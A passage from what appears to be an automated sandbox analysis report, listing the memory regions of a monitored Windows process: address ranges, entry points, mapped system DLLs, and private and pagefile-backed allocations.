"dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 720 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 721 start_va = 0x7fefbcb0000 end_va = 0x7fefbcbafff monitored = 0 entry_point = 0x7fefbcb1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 722 start_va = 0x7fefbcc0000 end_va = 0x7fefbcfafff monitored = 0 entry_point = 0x7fefbccf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 723 start_va = 0x7fefbd00000 end_va = 0x7fefbd42fff monitored = 0 entry_point = 0x7fefbd0c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 724 start_va = 0x7fefbd50000 end_va = 0x7fefbe41fff monitored = 0 entry_point = 0x7fefbd7ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 725 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 726 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 727 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 728 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 729 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 730 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 731 start_va = 0x7fefc450000 end_va = 0x7fefc559fff monitored = 0 entry_point = 0x7fefc451010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 732 start_va = 0x7fefc560000 end_va = 0x7fefc739fff monitored = 0 entry_point = 0x7fefc563130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 733 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 734 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 735 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 736 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 737 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 738 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 739 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 740 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 741 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 742 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 743 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 744 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 745 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 746 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 747 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 748 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 749 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 750 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 751 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 752 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 753 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 754 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 755 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 756 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 757 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 758 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 759 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 760 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 761 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 762 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 763 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 764 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 765 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 766 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 767 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 768 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 769 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 770 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 771 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 772 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 773 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 774 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 775 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 776 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 777 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 778 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 779 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 780 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 781 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 782 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 783 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 784 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 785 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 786 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 787 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 788 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 789 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 790 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 791 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 792 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 793 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 794 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 795 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 796 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 797 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 798 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 799 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 800 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 801 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 802 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 803 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 804 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 805 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 806 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 807 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 808 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 809 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 811 start_va = 0x3930000 end_va = 0x3945fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003930000" filename = "" Region: id = 812 start_va = 0x6df0000 end_va = 0x6e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006df0000" filename = "" Region: id = 813 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 814 start_va = 0x7db0000 end_va = 0x7fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007db0000" filename = "" Region: id = 815 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 816 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 817 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 818 start_va = 0x7db0000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007db0000" filename = "" Region: id = 819 start_va = 0x7f50000 end_va = 0x7fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f50000" filename = "" Region: id = 820 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 821 start_va = 0x6950000 end_va = 0x69cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006950000" filename = "" Region: id = 822 start_va = 0x7eb0000 end_va = 0x7f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007eb0000" filename = "" Region: id = 823 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 824 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 825 start_va = 0x3950000 end_va = 0x3961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 826 start_va = 0x3970000 end_va = 0x397dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 827 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 828 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 829 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 830 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 831 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 832 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 833 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 834 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 835 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 836 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 837 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 838 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 839 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 840 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 841 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 842 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 843 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 844 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 845 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 846 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 847 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 848 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 849 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 850 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 851 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 852 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 853 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 854 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 855 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 856 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 857 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 858 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 859 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 860 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 861 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 862 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 863 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 864 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 865 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 866 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 867 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 868 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 869 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = 